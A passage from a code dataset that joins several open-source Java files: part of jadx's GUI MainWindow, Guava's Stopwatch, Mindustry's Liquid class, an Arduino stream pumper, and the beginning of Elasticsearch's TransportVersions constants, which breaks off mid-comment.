JDialog settingsWindow = new JadxSettingsWindow(MainWindow.this, settings);
settingsWindow.setVisible(true);
settingsWindow.addWindowListener(new WindowAdapter() {
@Override
public void windowClosed(WindowEvent e) {
settingsOpen = false;
}
});
}
public boolean isSettingsOpen() {
return settingsOpen;
}
public void loadSettings() {
// queue update to not interrupt current UI tasks
UiUtils.uiRun(this::updateUiSettings);
}
private void updateUiSettings() {
LafManager.updateLaf(settings);
Font font = settings.getFont();
Font largerFont = font.deriveFont(font.getSize() + 2.f);
setFont(largerFont);
setEditorTheme(settings.getEditorThemePath());
tree.setFont(largerFont);
tree.setRowHeight(-1);
tabbedPane.loadSettings();
if (logPanel != null) {
logPanel.loadSettings();
}
shortcutsController.loadSettings();
}
private void closeWindow() {
saveAll();
if (!ensureProjectIsSaved()) {
return;
}
settings.setTreeWidth(treeSplitPane.getDividerLocation());
settings.saveWindowPos(this);
settings.setMainWindowExtendedState(getExtendedState());
if (debuggerPanel != null) {
saveSplittersInfo();
}
heapUsageBar.reset();
closeAll();
FileUtils.deleteTempRootDir();
dispose();
System.exit(0);
}
private void saveOpenTabs() {
project.saveOpenTabs(tabbedPane.getEditorViewStates());
}
private void restoreOpenTabs(List<EditorViewState> openTabs) {
UiUtils.uiThreadGuard();
if (openTabs.isEmpty()) {
return;
}
for (EditorViewState viewState : openTabs) {
tabbedPane.restoreEditorViewState(viewState);
}
}
private void preLoadOpenTabs(List<EditorViewState> openTabs) {
UiUtils.notUiThreadGuard();
for (EditorViewState tabState : openTabs) {
JNode node = tabState.getNode();
try {
node.getCodeInfo();
} catch (Exception e) {
LOG.warn("Failed to preload code for node: {}", node, e);
}
}
}
private void saveSplittersInfo() {
settings.setMainWindowVerticalSplitterLoc(bottomSplitPane.getDividerLocation());
if (debuggerPanel != null) {
settings.setDebuggerStackFrameSplitterLoc(debuggerPanel.getLeftSplitterLocation());
settings.setDebuggerVarTreeSplitterLoc(debuggerPanel.getRightSplitterLocation());
}
}
public void addLoadListener(ILoadListener loadListener) {
this.loadListeners.add(loadListener);
// set initial value
loadListener.update(loaded);
}
public void notifyLoadListeners(boolean loaded) {
this.loaded = loaded;
loadListeners.removeIf(listener -> listener.update(loaded));
}
public void addTreeUpdateListener(Consumer<JRoot> listener) {
treeUpdateListener.add(listener);
}
public JadxWrapper getWrapper() {
return wrapper;
}
public JadxProject getProject() {
return project;
}
public TabbedPane getTabbedPane() {
return tabbedPane;
}
public JadxSettings getSettings() {
return settings;
}
public CacheObject getCacheObject() {
return cacheObject;
}
public BackgroundExecutor getBackgroundExecutor() {
return backgroundExecutor;
}
public JRoot getTreeRoot() {
return treeRoot;
}
public JDebuggerPanel getDebuggerPanel() {
initDebuggerPanel();
return debuggerPanel;
}
public ShortcutsController getShortcutsController() {
return shortcutsController;
}
public void showDebuggerPanel() {
initDebuggerPanel();
}
public void destroyDebuggerPanel() {
saveSplittersInfo();
if (debuggerPanel != null) {
debuggerPanel.setVisible(false);
debuggerPanel = null;
}
}
public void showHeapUsageBar() {
settings.setShowHeapUsageBar(true);
heapUsageBar.setVisible(true);
}
private void initDebuggerPanel() {
if (debuggerPanel == null) {
debuggerPanel = new JDebuggerPanel(this);
debuggerPanel.loadSettings();
bottomSplitPane.setBottomComponent(debuggerPanel);
int loc = settings.getMainWindowVerticalSplitterLoc();
if (loc == 0) {
loc = 300;
}
bottomSplitPane.setDividerLocation(loc);
}
}
public void showLogViewer(LogOptions logOptions) {
UiUtils.uiRun(() -> {
if (settings.isDockLogViewer()) {
showDockedLog(logOptions);
} else {
LogViewerDialog.open(this, logOptions);
}
});
}
private void showDockedLog(LogOptions logOptions) {
if (logPanel != null) {
logPanel.applyLogOptions(logOptions);
return;
}
Runnable undock = () -> {
hideDockedLog();
settings.setDockLogViewer(false);
LogViewerDialog.open(this, logOptions);
};
logPanel = new LogPanel(this, logOptions, undock, this::hideDockedLog);
rightSplitPane.setBottomComponent(logPanel);
}
private void hideDockedLog() {
if (logPanel == null) {
return;
}
logPanel.dispose();
logPanel = null;
rightSplitPane.setBottomComponent(null);
}
public JMenu getPluginsMenu() {
return pluginsMenu;
}
public void resetPluginsMenu() {
pluginsMenu.removeAll();
pluginsMenu.add(new ActionHandler(() -> new PluginSettings(this, settings).addPlugin())
.withNameAndDesc(NLS.str("preferences.plugins.install")));
}
public void addToPluginsMenu(Action item) {
if (pluginsMenu.getMenuComponentCount() == 1) {
pluginsMenu.addSeparator();
}
pluginsMenu.add(item);
}
public RenameMappingsGui getRenameMappings() {
return renameMappings;
}
public CacheManager getCacheManager() {
return cacheManager;
}
/**
* Events instance if decompiler not yet available
*/
private final IJadxEvents fallbackEvents = new JadxEventsImpl();
public IJadxEvents events() {
return wrapper.getCurrentDecompiler()
.map(JadxDecompiler::events)
.orElse(fallbackEvents);
}
}
| skylot/jadx | jadx-gui/src/main/java/jadx/gui/ui/MainWindow.java |
1,018 | /*
* Copyright (C) 2008 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License
* is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
* or implied. See the License for the specific language governing permissions and limitations under
* the License.
*/
package com.google.common.base;
import static com.google.common.base.Preconditions.checkNotNull;
import static com.google.common.base.Preconditions.checkState;
import static java.util.concurrent.TimeUnit.DAYS;
import static java.util.concurrent.TimeUnit.HOURS;
import static java.util.concurrent.TimeUnit.MICROSECONDS;
import static java.util.concurrent.TimeUnit.MILLISECONDS;
import static java.util.concurrent.TimeUnit.MINUTES;
import static java.util.concurrent.TimeUnit.NANOSECONDS;
import static java.util.concurrent.TimeUnit.SECONDS;
import com.google.common.annotations.GwtCompatible;
import com.google.errorprone.annotations.CanIgnoreReturnValue;
import java.util.concurrent.TimeUnit;
/**
* An object that accurately measures <i>elapsed time</i>: the measured duration between two
* successive readings of "now" in the same process.
*
* <p>In contrast, <i>wall time</i> is a reading of "now" as given by a method like
* {@link System#currentTimeMillis()}, best represented as an {@link java.time.Instant}. Such values
* <i>can</i> be subtracted to obtain a {@code Duration} (such as by {@code Duration.between}), but
* doing so does <i>not</i> give a reliable measurement of elapsed time, because wall time readings
* are inherently approximate, routinely affected by periodic clock corrections. Because this class
* (by default) uses {@link System#nanoTime}, it is unaffected by these changes.
*
* <p>Use this class instead of direct calls to {@link System#nanoTime} for two reasons:
*
* <ul>
* <li>The raw {@code long} values returned by {@code nanoTime} are meaningless and unsafe to use
* in any other way than how {@code Stopwatch} uses them.
* <li>An alternative source of nanosecond ticks can be substituted, for example for testing or
* performance reasons, without affecting most of your code.
* </ul>
*
* <p>The one downside of {@code Stopwatch} relative to {@link System#nanoTime()} is that {@code
* Stopwatch} requires object allocation and additional method calls, which can reduce the accuracy
* of the elapsed times reported. {@code Stopwatch} is still suitable for logging and metrics where
* reasonably accurate values are sufficient. If the uncommon case that you need to maximize
* accuracy, use {@code System.nanoTime()} directly instead.
*
* <p>Basic usage:
*
* <pre>{@code
* Stopwatch stopwatch = Stopwatch.createStarted();
* doSomething();
* stopwatch.stop(); // optional
*
* long millis = stopwatch.elapsed(MILLISECONDS);
*
* log.info("time: " + stopwatch); // formatted string like "12.3 ms"
* }</pre>
*
* <p>The state-changing methods are not idempotent; it is an error to start or stop a stopwatch
* that is already in the desired state.
*
* <p>When testing code that uses this class, use {@link #createUnstarted(Ticker)} or {@link
* #createStarted(Ticker)} to supply a fake or mock ticker. This allows you to simulate any valid
* behavior of the stopwatch.
*
* <p><b>Note:</b> This class is not thread-safe.
*
* <p><b>Warning for Android users:</b> a stopwatch with default behavior may not continue to keep
* time while the device is asleep. Instead, create one like this:
*
* <pre>{@code
* Stopwatch.createStarted(
* new Ticker() {
* public long read() {
* return android.os.SystemClock.elapsedRealtimeNanos(); // requires API Level 17
* }
* });
* }</pre>
*
* @author Kevin Bourrillion
* @since 10.0
*/
@GwtCompatible(emulated = true)
@SuppressWarnings("GoodTime") // lots of violations
@ElementTypesAreNonnullByDefault
public final class Stopwatch {
private final Ticker ticker;
private boolean isRunning;
private long elapsedNanos;
private long startTick;
/**
* Creates (but does not start) a new stopwatch using {@link System#nanoTime} as its time source.
*
* @since 15.0
*/
public static Stopwatch createUnstarted() {
return new Stopwatch();
}
/**
* Creates (but does not start) a new stopwatch, using the specified time source.
*
* @since 15.0
*/
public static Stopwatch createUnstarted(Ticker ticker) {
return new Stopwatch(ticker);
}
/**
* Creates (and starts) a new stopwatch using {@link System#nanoTime} as its time source.
*
* @since 15.0
*/
public static Stopwatch createStarted() {
return new Stopwatch().start();
}
/**
* Creates (and starts) a new stopwatch, using the specified time source.
*
* @since 15.0
*/
public static Stopwatch createStarted(Ticker ticker) {
return new Stopwatch(ticker).start();
}
Stopwatch() {
this.ticker = Ticker.systemTicker();
}
Stopwatch(Ticker ticker) {
this.ticker = checkNotNull(ticker, "ticker");
}
/**
* Returns {@code true} if {@link #start()} has been called on this stopwatch, and {@link #stop()}
* has not been called since the last call to {@code start()}.
*/
public boolean isRunning() {
return isRunning;
}
/**
* Starts the stopwatch.
*
* @return this {@code Stopwatch} instance
* @throws IllegalStateException if the stopwatch is already running.
*/
@CanIgnoreReturnValue
public Stopwatch start() {
checkState(!isRunning, "This stopwatch is already running.");
isRunning = true;
startTick = ticker.read();
return this;
}
/**
* Stops the stopwatch. Future reads will return the fixed duration that had elapsed up to this
* point.
*
* @return this {@code Stopwatch} instance
* @throws IllegalStateException if the stopwatch is already stopped.
*/
@CanIgnoreReturnValue
public Stopwatch stop() {
long tick = ticker.read();
checkState(isRunning, "This stopwatch is already stopped.");
isRunning = false;
elapsedNanos += tick - startTick;
return this;
}
/**
* Sets the elapsed time for this stopwatch to zero, and places it in a stopped state.
*
* @return this {@code Stopwatch} instance
*/
@CanIgnoreReturnValue
public Stopwatch reset() {
elapsedNanos = 0;
isRunning = false;
return this;
}
private long elapsedNanos() {
return isRunning ? ticker.read() - startTick + elapsedNanos : elapsedNanos;
}
/**
* Returns the current elapsed time shown on this stopwatch, expressed in the desired time unit,
* with any fraction rounded down.
*
* <p>Note that the overhead of measurement can be more than a microsecond, so it is generally not
* useful to specify {@link TimeUnit#NANOSECONDS} precision here.
*
* @since 14.0 (since 10.0 as {@code elapsedTime()})
*/
public long elapsed(TimeUnit desiredUnit) {
return desiredUnit.convert(elapsedNanos(), NANOSECONDS);
}
/** Returns a string representation of the current elapsed time. */
@Override
public String toString() {
long nanos = elapsedNanos();
TimeUnit unit = chooseUnit(nanos);
double value = (double) nanos / NANOSECONDS.convert(1, unit);
// Too bad this functionality is not exposed as a regular method call
return Platform.formatCompact4Digits(value) + " " + abbreviate(unit);
}
private static TimeUnit chooseUnit(long nanos) {
if (DAYS.convert(nanos, NANOSECONDS) > 0) {
return DAYS;
}
if (HOURS.convert(nanos, NANOSECONDS) > 0) {
return HOURS;
}
if (MINUTES.convert(nanos, NANOSECONDS) > 0) {
return MINUTES;
}
if (SECONDS.convert(nanos, NANOSECONDS) > 0) {
return SECONDS;
}
if (MILLISECONDS.convert(nanos, NANOSECONDS) > 0) {
return MILLISECONDS;
}
if (MICROSECONDS.convert(nanos, NANOSECONDS) > 0) {
return MICROSECONDS;
}
return NANOSECONDS;
}
private static String abbreviate(TimeUnit unit) {
switch (unit) {
case NANOSECONDS:
return "ns";
case MICROSECONDS:
return "\u03bcs"; // μs
case MILLISECONDS:
return "ms";
case SECONDS:
return "s";
case MINUTES:
return "min";
case HOURS:
return "h";
case DAYS:
return "d";
default:
throw new AssertionError();
}
}
}
| google/guava | android/guava/src/com/google/common/base/Stopwatch.java |
1,019 | package mindustry.type;
import arc.graphics.*;
import arc.graphics.g2d.*;
import arc.math.*;
import arc.struct.*;
import arc.util.*;
import mindustry.content.*;
import mindustry.ctype.*;
import mindustry.entities.*;
import mindustry.gen.*;
import mindustry.graphics.*;
import mindustry.logic.*;
import mindustry.world.*;
import mindustry.world.meta.*;
import static mindustry.entities.Puddles.*;
/** A better name for this class would be "fluid", but it's too late for that. */
public class Liquid extends UnlockableContent implements Senseable{
//must be static and global so conduits don't conflict - DO NOT INTERACT WITH THESE IN MODS OR I WILL PERSONALLY YELL AT YOU
public static final int animationFrames = 50;
public static float animationScaleGas = 190f, animationScaleLiquid = 230f;
protected static final Rand rand = new Rand();
/** If true, this fluid is treated as a gas (and does not create puddles) */
public boolean gas = false;
/** Color used in pipes and on the ground. */
public Color color;
/** Color of this liquid in gas form. */
public Color gasColor = Color.lightGray.cpy();
/** Color used in bars. */
public @Nullable Color barColor;
/** Color used to draw lights. Note that the alpha channel is used to dictate brightness. */
public Color lightColor = Color.clear.cpy();
/** 0-1, 0 is completely not flammable, anything above that may catch fire when exposed to heat, 0.5+ is very flammable. */
public float flammability;
/** temperature: 0.5 is 'room' temperature, 0 is very cold, 1 is molten hot */
public float temperature = 0.5f;
/** how much heat this liquid can store. 0.4=water (decent), anything lower is probably less dense and bad at cooling. */
public float heatCapacity = 0.5f;
/** how thick this liquid is. 0.5=water (relatively viscous), 1 would be something like tar (very slow). */
public float viscosity = 0.5f;
/** how prone to exploding this liquid is, when heated. 0 = nothing, 1 = nuke */
public float explosiveness;
/** whether this fluid reacts in blocks at all (e.g. slag with water) */
public boolean blockReactive = true;
/** if false, this liquid cannot be a coolant */
public boolean coolant = true;
/** if true, this liquid can move through blocks as a puddle. */
public boolean moveThroughBlocks = false;
/** if true, this liquid can be incinerated in the incinerator block. */
public boolean incinerable = true;
/** The associated status effect. */
public StatusEffect effect = StatusEffects.none;
/** Effect shown in puddles. */
public Effect particleEffect = Fx.none;
/** Particle effect rate spacing in ticks. */
public float particleSpacing = 60f;
/** Temperature at which this liquid vaporizes. This isn't just boiling. */
public float boilPoint = 2f;
/** If true, puddle size is capped. */
public boolean capPuddles = true;
/** Effect when this liquid vaporizes. */
public Effect vaporEffect = Fx.vapor;
/** If true, this liquid is hidden in most UI. */
public boolean hidden;
/** Liquids this puddle can stay on, e.g. oil on water. */
public ObjectSet<Liquid> canStayOn = new ObjectSet<>();
public Liquid(String name, Color color){
super(name);
this.color = new Color(color);
}
/** For modding only.*/
public Liquid(String name){
this(name, new Color(Color.black));
}
@Override
public void init(){
super.init();
if(gas){
//always "boils", it's a gas
boilPoint = -1;
//ensure no accidental global mutation
color = color.cpy();
//all gases are transparent
color.a = 0.6f;
//for gases, gas color is implicitly their color
gasColor = color;
if(barColor == null){
barColor = color.cpy().a(1f);
}
}
}
@Override
public boolean isHidden(){
return hidden;
}
public int getAnimationFrame(){
return (int)(Time.time / (gas ? animationScaleGas : animationScaleLiquid) * animationFrames + id*5) % animationFrames;
}
/** @return true if this liquid will boil in this global environment. */
public boolean willBoil(){
return Attribute.heat.env() >= boilPoint;
}
public boolean canExtinguish(){
return flammability < 0.1f && temperature <= 0.5f;
}
public Color barColor(){
return barColor == null ? color : barColor;
}
/** Draws a puddle of this liquid on the floor. */
public void drawPuddle(Puddle puddle){
float amount = puddle.amount, x = puddle.x, y = puddle.y;
float f = Mathf.clamp(amount / (maxLiquid / 1.5f));
float smag = puddle.tile.floor().isLiquid ? 0.8f : 0f, sscl = 25f;
Draw.color(Tmp.c1.set(color).shiftValue(-0.05f));
Fill.circle(x + Mathf.sin(Time.time + id * 532, sscl, smag), y + Mathf.sin(Time.time + id * 53, sscl, smag), f * 8f);
float length = f * 6f;
rand.setSeed(id);
for(int i = 0; i < 3; i++){
Tmp.v1.trns(rand.random(360f), rand.random(length));
float vx = x + Tmp.v1.x, vy = y + Tmp.v1.y;
Fill.circle(
vx + Mathf.sin(Time.time + i * 532, sscl, smag),
vy + Mathf.sin(Time.time + i * 53, sscl, smag),
f * 5f);
}
Draw.color();
if(lightColor.a > 0.001f && f > 0){
Drawf.light(x, y, 30f * f, lightColor, color.a * f * 0.8f);
}
}
/** Runs when puddles update. */
public void update(Puddle puddle){
}
//TODO proper API for this (do not use yet!)
public float react(Liquid other, float amount, Tile tile, float x, float y){
return 0f;
}
@Override
public void setStats(){
stats.addPercent(Stat.explosiveness, explosiveness);
stats.addPercent(Stat.flammability, flammability);
stats.addPercent(Stat.temperature, temperature);
stats.addPercent(Stat.heatCapacity, heatCapacity);
stats.addPercent(Stat.viscosity, viscosity);
}
@Override
public double sense(LAccess sensor){
if(sensor == LAccess.color) return color.toDoubleBits();
if(sensor == LAccess.id) return getLogicId();
return Double.NaN;
}
@Override
public Object senseObject(LAccess sensor){
if(sensor == LAccess.name) return name;
return noSensed;
}
@Override
public String toString(){
return localizedName;
}
@Override
public ContentType getContentType(){
return ContentType.liquid;
}
}
| Anuken/Mindustry | core/src/mindustry/type/Liquid.java |
1,022 | /*
* This file is part of Arduino.
*
* Copyright 2015 Arduino LLC (http://www.arduino.cc/)
*
* Arduino is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*
* As a special exception, you may use this file as part of a free software
* library without restriction. Specifically, if other files instantiate
* templates or use macros or inline functions from this file, or you compile
* this file and link it with other files to produce an executable, this
* file does not by itself cause the resulting executable to be covered by
* the GNU General Public License. This exception does not however
* invalidate any other reasons why the executable file might be covered by
* the GNU General Public License.
*/
package cc.arduino;
import processing.app.debug.MessageConsumer;
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
/**
* A version of StreamPumper from commons-exec that write to a MessageConsumer
*/
public class MyStreamPumper implements Runnable {
/**
* the input stream to pump from
*/
private final BufferedReader reader;
/**
* the output stream to pmp into
*/
private final MessageConsumer messageConsumer;
/**
* was the end of the stream reached
*/
private boolean finished;
public MyStreamPumper(final InputStream is, final MessageConsumer messageConsumer) {
this.reader = new BufferedReader(new InputStreamReader(is));
this.messageConsumer = messageConsumer;
}
/**
* Copies data from the input stream to the output stream. Terminates as
* soon as the input stream is closed or an error occurs.
*/
@Override
public void run() {
synchronized (this) {
// Just in case this object is reused in the future
finished = false;
}
try {
String line;
while ((line = reader.readLine()) != null) {
messageConsumer.message(line);
}
} catch (Exception e) {
// nothing to do - happens quite often with watchdog
} finally {
synchronized (this) {
finished = true;
notifyAll();
}
}
}
/**
* Tells whether the end of the stream has been reached.
*
* @return true is the stream has been exhausted.
*/
public synchronized boolean isFinished() {
return finished;
}
/**
* This method blocks until the stream pumper finishes.
*
* @see #isFinished()
*/
public synchronized void waitFor() throws InterruptedException {
while (!isFinished()) {
wait();
}
}
}
| roboard/86Duino | arduino-core/src/cc/arduino/MyStreamPumper.java |
1,023 | /*
* Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
* or more contributor license agreements. Licensed under the Elastic License
* 2.0 and the Server Side Public License, v 1; you may not use this file except
* in compliance with, at your election, the Elastic License 2.0 or the Server
* Side Public License, v 1.
*/
package org.elasticsearch;
import org.elasticsearch.core.Assertions;
import org.elasticsearch.core.UpdateForV9;
import java.lang.reflect.Field;
import java.util.Collection;
import java.util.Collections;
import java.util.HashMap;
import java.util.Map;
import java.util.NavigableMap;
import java.util.Set;
import java.util.TreeMap;
import java.util.TreeSet;
import java.util.function.IntFunction;
/**
* <p>Transport version is used to coordinate compatible wire protocol communication between nodes, at a fine-grained level. This replaces
* and supersedes the old Version constants.</p>
*
* <p>Before adding a new version constant, please read the block comment at the end of the list of constants.</p>
*/
public class TransportVersions {
/*
* NOTE: IntelliJ lies!
* This map is used during class construction, referenced by the registerTransportVersion method.
* When all the transport version constants have been registered, the map is cleared & never touched again.
*/
static TreeSet<Integer> IDS = new TreeSet<>();
static TransportVersion def(int id) {
if (IDS == null) throw new IllegalStateException("The IDS map needs to be present to call this method");
if (IDS.add(id) == false) {
throw new IllegalArgumentException("Version id " + id + " defined twice");
}
if (id < IDS.last()) {
throw new IllegalArgumentException("Version id " + id + " is not defined in the right location. Keep constants sorted");
}
return new TransportVersion(id);
}
@UpdateForV9 // remove the transport versions with which v9 will not need to interact
public static final TransportVersion ZERO = def(0);
public static final TransportVersion V_7_0_0 = def(7_00_00_99);
public static final TransportVersion V_7_0_1 = def(7_00_01_99);
public static final TransportVersion V_7_1_0 = def(7_01_00_99);
public static final TransportVersion V_7_2_0 = def(7_02_00_99);
public static final TransportVersion V_7_2_1 = def(7_02_01_99);
public static final TransportVersion V_7_3_0 = def(7_03_00_99);
public static final TransportVersion V_7_3_2 = def(7_03_02_99);
public static final TransportVersion V_7_4_0 = def(7_04_00_99);
public static final TransportVersion V_7_5_0 = def(7_05_00_99);
public static final TransportVersion V_7_6_0 = def(7_06_00_99);
public static final TransportVersion V_7_7_0 = def(7_07_00_99);
public static final TransportVersion V_7_8_0 = def(7_08_00_99);
public static final TransportVersion V_7_8_1 = def(7_08_01_99);
public static final TransportVersion V_7_9_0 = def(7_09_00_99);
public static final TransportVersion V_7_10_0 = def(7_10_00_99);
public static final TransportVersion V_7_10_1 = def(7_10_01_99);
public static final TransportVersion V_7_11_0 = def(7_11_00_99);
public static final TransportVersion V_7_12_0 = def(7_12_00_99);
public static final TransportVersion V_7_13_0 = def(7_13_00_99);
public static final TransportVersion V_7_14_0 = def(7_14_00_99);
public static final TransportVersion V_7_15_0 = def(7_15_00_99);
public static final TransportVersion V_7_15_1 = def(7_15_01_99);
public static final TransportVersion V_7_16_0 = def(7_16_00_99);
public static final TransportVersion V_7_17_0 = def(7_17_00_99);
public static final TransportVersion V_7_17_1 = def(7_17_01_99);
public static final TransportVersion V_7_17_8 = def(7_17_08_99);
public static final TransportVersion V_8_0_0 = def(8_00_00_99);
public static final TransportVersion V_8_1_0 = def(8_01_00_99);
public static final TransportVersion V_8_2_0 = def(8_02_00_99);
public static final TransportVersion V_8_3_0 = def(8_03_00_99);
public static final TransportVersion V_8_4_0 = def(8_04_00_99);
public static final TransportVersion V_8_5_0 = def(8_05_00_99);
public static final TransportVersion V_8_6_0 = def(8_06_00_99);
public static final TransportVersion V_8_6_1 = def(8_06_01_99);
public static final TransportVersion V_8_7_0 = def(8_07_00_99);
public static final TransportVersion V_8_7_1 = def(8_07_01_99);
public static final TransportVersion V_8_8_0 = def(8_08_00_99);
public static final TransportVersion V_8_8_1 = def(8_08_01_99);
/*
* READ THE COMMENT BELOW THIS BLOCK OF DECLARATIONS BEFORE ADDING NEW TRANSPORT VERSIONS
* Detached transport versions added below here.
*/
public static final TransportVersion V_8_9_X = def(8_500_020);
public static final TransportVersion V_8_10_X = def(8_500_061);
public static final TransportVersion V_8_11_X = def(8_512_00_1);
public static final TransportVersion V_8_12_0 = def(8_560_00_0);
public static final TransportVersion V_8_12_1 = def(8_560_00_1);
public static final TransportVersion V_8_13_0 = def(8_595_00_0);
public static final TransportVersion V_8_13_4 = def(8_595_00_1);
// 8.14.0+
public static final TransportVersion RANDOM_AGG_SHARD_SEED = def(8_596_00_0);
public static final TransportVersion ESQL_TIMINGS = def(8_597_00_0);
public static final TransportVersion DATA_STREAM_AUTO_SHARDING_EVENT = def(8_598_00_0);
public static final TransportVersion ADD_FAILURE_STORE_INDICES_OPTIONS = def(8_599_00_0);
public static final TransportVersion ESQL_ENRICH_OPERATOR_STATUS = def(8_600_00_0);
public static final TransportVersion ESQL_SERIALIZE_ARRAY_VECTOR = def(8_601_00_0);
public static final TransportVersion ESQL_SERIALIZE_ARRAY_BLOCK = def(8_602_00_0);
public static final TransportVersion ADD_DATA_STREAM_GLOBAL_RETENTION = def(8_603_00_0);
public static final TransportVersion ALLOCATION_STATS = def(8_604_00_0);
public static final TransportVersion ESQL_EXTENDED_ENRICH_TYPES = def(8_605_00_0);
public static final TransportVersion KNN_EXPLICIT_BYTE_QUERY_VECTOR_PARSING = def(8_606_00_0);
public static final TransportVersion ESQL_EXTENDED_ENRICH_INPUT_TYPE = def(8_607_00_0);
public static final TransportVersion ESQL_SERIALIZE_BIG_VECTOR = def(8_608_00_0);
public static final TransportVersion AGGS_EXCLUDED_DELETED_DOCS = def(8_609_00_0);
public static final TransportVersion ESQL_SERIALIZE_BIG_ARRAY = def(8_610_00_0);
public static final TransportVersion AUTO_SHARDING_ROLLOVER_CONDITION = def(8_611_00_0);
public static final TransportVersion KNN_QUERY_VECTOR_BUILDER = def(8_612_00_0);
public static final TransportVersion USE_DATA_STREAM_GLOBAL_RETENTION = def(8_613_00_0);
public static final TransportVersion ML_COMPLETION_INFERENCE_SERVICE_ADDED = def(8_614_00_0);
public static final TransportVersion ML_INFERENCE_EMBEDDING_BYTE_ADDED = def(8_615_00_0);
public static final TransportVersion ML_INFERENCE_L2_NORM_SIMILARITY_ADDED = def(8_616_00_0);
public static final TransportVersion SEARCH_NODE_LOAD_AUTOSCALING = def(8_617_00_0);
public static final TransportVersion ESQL_ES_SOURCE_OPTIONS = def(8_618_00_0);
public static final TransportVersion ADD_PERSISTENT_TASK_EXCEPTIONS = def(8_619_00_0);
public static final TransportVersion ESQL_REDUCER_NODE_FRAGMENT = def(8_620_00_0);
public static final TransportVersion FAILURE_STORE_ROLLOVER = def(8_621_00_0);
public static final TransportVersion CCR_STATS_API_TIMEOUT_PARAM = def(8_622_00_0);
public static final TransportVersion ESQL_ORDINAL_BLOCK = def(8_623_00_0);
public static final TransportVersion ML_INFERENCE_COHERE_RERANK = def(8_624_00_0);
public static final TransportVersion INDEXING_PRESSURE_DOCUMENT_REJECTIONS_COUNT = def(8_625_00_0);
public static final TransportVersion ALIAS_ACTION_RESULTS = def(8_626_00_0);
public static final TransportVersion HISTOGRAM_AGGS_KEY_SORTED = def(8_627_00_0);
public static final TransportVersion INFERENCE_FIELDS_METADATA = def(8_628_00_0);
public static final TransportVersion ML_INFERENCE_TIMEOUT_ADDED = def(8_629_00_0);
public static final TransportVersion MODIFY_DATA_STREAM_FAILURE_STORES = def(8_630_00_0);
public static final TransportVersion ML_INFERENCE_RERANK_NEW_RESPONSE_FORMAT = def(8_631_00_0);
public static final TransportVersion HIGHLIGHTERS_TAGS_ON_FIELD_LEVEL = def(8_632_00_0);
public static final TransportVersion TRACK_FLUSH_TIME_EXCLUDING_WAITING_ON_LOCKS = def(8_633_00_0);
public static final TransportVersion ML_INFERENCE_AZURE_OPENAI_EMBEDDINGS = def(8_634_00_0);
public static final TransportVersion ILM_SHRINK_ENABLE_WRITE = def(8_635_00_0);
public static final TransportVersion GEOIP_CACHE_STATS = def(8_636_00_0);
public static final TransportVersion SHUTDOWN_REQUEST_TIMEOUTS_FIX_8_14 = def(8_636_00_1);
public static final TransportVersion WATERMARK_THRESHOLDS_STATS = def(8_637_00_0);
public static final TransportVersion ENRICH_CACHE_ADDITIONAL_STATS = def(8_638_00_0);
public static final TransportVersion ML_INFERENCE_RATE_LIMIT_SETTINGS_ADDED = def(8_639_00_0);
public static final TransportVersion ML_TRAINED_MODEL_CACHE_METADATA_ADDED = def(8_640_00_0);
public static final TransportVersion TOP_LEVEL_KNN_SUPPORT_QUERY_NAME = def(8_641_00_0);
public static final TransportVersion INDEX_SEGMENTS_VECTOR_FORMATS = def(8_642_00_0);
public static final TransportVersion ADD_RESOURCE_ALREADY_UPLOADED_EXCEPTION = def(8_643_00_0);
public static final TransportVersion ESQL_MV_ORDERING_SORTED_ASCENDING = def(8_644_00_0);
public static final TransportVersion ESQL_PAGE_MAPPING_TO_ITERATOR = def(8_645_00_0);
public static final TransportVersion BINARY_PIT_ID = def(8_646_00_0);
public static final TransportVersion SECURITY_ROLE_MAPPINGS_IN_CLUSTER_STATE = def(8_647_00_0);
public static final TransportVersion ESQL_REQUEST_TABLES = def(8_648_00_0);
public static final TransportVersion ROLE_REMOTE_CLUSTER_PRIVS = def(8_649_00_0);
public static final TransportVersion NO_GLOBAL_RETENTION_FOR_SYSTEM_DATA_STREAMS = def(8_650_00_0);
public static final TransportVersion SHUTDOWN_REQUEST_TIMEOUTS_FIX = def(8_651_00_0);
public static final TransportVersion INDEXING_PRESSURE_REQUEST_REJECTIONS_COUNT = def(8_652_00_0);
public static final TransportVersion ROLLUP_USAGE = def(8_653_00_0);
public static final TransportVersion SECURITY_ROLE_DESCRIPTION = def(8_654_00_0);
public static final TransportVersion ML_INFERENCE_AZURE_OPENAI_COMPLETIONS = def(8_655_00_0);
public static final TransportVersion JOIN_STATUS_AGE_SERIALIZATION = def(8_656_00_0);
public static final TransportVersion ML_RERANK_DOC_OPTIONAL = def(8_657_00_0);
/*
* STOP! READ THIS FIRST! No, really,
* ____ _____ ___ ____ _ ____ _____ _ ____ _____ _ _ ___ ____ _____ ___ ____ ____ _____ _
* / ___|_ _/ _ \| _ \| | | _ \| ____| / \ | _ \ |_ _| | | |_ _/ ___| | ___|_ _| _ \/ ___|_ _| |
* \___ \ | || | | | |_) | | | |_) | _| / _ \ | | | | | | | |_| || |\___ \ | |_ | || |_) \___ \ | | | |
* ___) || || |_| | __/|_| | _ <| |___ / ___ \| |_| | | | | _ || | ___) | | _| | || _ < ___) || | |_|
* |____/ |_| \___/|_| (_) |_| \_\_____/_/ \_\____/ |_| |_| |_|___|____/ |_| |___|_| \_\____/ |_| (_)
*
* A new transport version should be added EVERY TIME a change is made to the serialization protocol of one or more classes. Each
* transport version should only be used in a single merged commit (apart from the BwC versions copied from o.e.Version, ≤V_8_8_1).
*
* ADDING A TRANSPORT VERSION
* To add a new transport version, add a new constant at the bottom of the list, above this comment. Don't add other lines,
* comments, etc. The version id has the following layout:
*
* M_NNN_SS_P
*
